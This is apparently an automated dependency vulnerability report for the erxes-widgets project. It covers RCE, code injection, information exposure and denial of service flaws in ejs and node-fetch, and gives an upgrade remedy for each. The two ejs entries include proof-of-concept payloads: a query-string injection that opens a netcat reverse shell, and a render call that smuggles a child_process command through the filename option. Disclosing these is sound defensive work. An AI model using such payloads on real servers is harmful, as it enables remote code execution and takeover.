Vulnerabilities: 4 via 6 paths

Dependencies: 161

Source: GitHub

Commit: 5d024d42


high severity

Remote Code Execution (RCE)

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.7.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.

Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.

PoC:

Creation of reverse shell:

http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s

Remediation

Upgrade ejs to version 3.1.7 or higher.


medium severity

Information Exposure

  • Vulnerable module: node-fetch
  • Introduced through: react@16.4.2 and react-dom@16.4.2

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e react@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react@16.5.0.
  • Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e react-dom@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react-dom@16.5.0.

Overview

node-fetch is a light-weight module that brings window.fetch to node.js.

Affected versions of this package are vulnerable to Information Exposure. When fetching a remote URL with a Cookie header, if the response carries a Location header, node-fetch follows the redirect and requests the new URL with the same cookie. This can forward sensitive headers to a third party.

Remediation

Upgrade node-fetch to version 2.6.7, 3.1.1 or higher.


medium severity

Denial of Service

  • Vulnerable module: node-fetch
  • Introduced through: react@16.4.2 and react-dom@16.4.2

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e react@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react@16.5.0.
  • Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e react-dom@16.4.2 fbjs@0.8.18 isomorphic-fetch@2.2.1 node-fetch@1.7.3
    Remediation: Upgrade to react-dom@16.5.0.

Overview

node-fetch is a light-weight module that brings window.fetch to node.js.

Affected versions of this package are vulnerable to Denial of Service. node-fetch did not honor the size option after following a redirect, which means that when the content size exceeded the limit, a FetchError was never thrown and the process completed without failure.

Remediation

Upgrade node-fetch to version 2.6.1, 3.0.0-beta.9 or higher.


medium severity

Arbitrary Code Injection

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.6.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Arbitrary Code Injection via render and renderFile. If external input flows into the options parameter, an attacker is able to run arbitrary code. This includes the filename, compileDebug, and client options.

POC

let ejs = require('ejs')
ejs.render('./views/test.ejs',{
    filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
    compileDebug: true,
    message: 'test',
    client: true
})

Remediation

Upgrade ejs to version 3.1.6 or higher.
